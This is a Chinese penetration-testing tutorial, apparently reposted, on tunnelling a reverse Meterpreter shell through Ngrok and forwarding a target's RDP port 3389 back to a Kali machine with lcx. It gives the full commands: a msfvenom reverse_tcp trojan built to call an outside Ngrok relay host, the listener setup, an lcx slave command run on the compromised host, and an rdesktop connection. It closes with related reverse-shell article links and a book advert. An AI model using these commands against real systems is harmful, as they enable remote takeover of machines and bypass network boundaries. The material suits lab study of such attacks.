内容简介:相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Kali地址:192.168.61.130(攻击机地址)靶机win2008: 192.168.61.134(模拟外网私人地址)
相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透 工具 了,网上很多工具都能实现,这里推荐 Ngrok 。但是我既想通过Ngrok在metaspolit下反弹shell,同时又想把对方的3389端口转发到本地,在meterperter下鱼和熊掌我都要!
Kali地址:192.168.61.130(攻击机地址)
靶机win2008: 192.168.61.134(模拟外网私人地址)
中间跳板ngrok :vipgz4.idcfengye.com
工具:lcx windows版与 linux 版
一、反弹 shell 到本地
1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)
2.在kali下构造生成反弹木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=vipgz4.idcfengye.com LPORT=10040 -f exe -a x86 --platform win -o gong32.exe Lhost:为Ngrok服务地址 Lport:为Ngrok分配的隧道端口
3.在Kali中运行Ngrok的客户端:
./sunny clientid Ngrok的ID号
4.Kali攻击机配置监听:
此处的lhost与lport与Ngrok中的配置相同,并开始监听。
5.将生成的木马放到靶机运行:
成功得到通过中转反弹过来的shell。
PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。
二、转发3389端口到本地
1.在Kali中执行lcx监听和转发命令:
./portmap -m 2 -p1 8848 -p2 33891
P1为本地监听的端口(与ngrok转发的端口一致)
P2为本地转发的端口(随便命名,但不能是已被占用的端口)
2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:
lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389
slave后跟Ngrok服务器地址与隧道端口+本地需要转发的端口
看到ngrok客户端多出回弹的消息
3.开始在Kali中连接远程桌面连接:
rdesktop 127.0.0.1:33891
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 使用Java反弹shell
- powershell反弹shell常见方式
- 渗透测试之反弹shell命令分析
- DELPHI黑客编程(二):反弹后门原理实现
- 红队渗透测试之使用 OpenSSL 反弹加密 shell
- 照弹不误:出站端口受限环境下反弹Shell的思考
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
XML Hacks
Michael Fitzgerald / O'Reilly Media, Inc. / 2004-07-27 / USD 24.95
Developers and system administrators alike are uncovering the true power of XML, the Extensible Markup Language that enables data to be sent over the Internet from one computer platform to another or ......一起来看看 《XML Hacks》 这本书的介绍吧!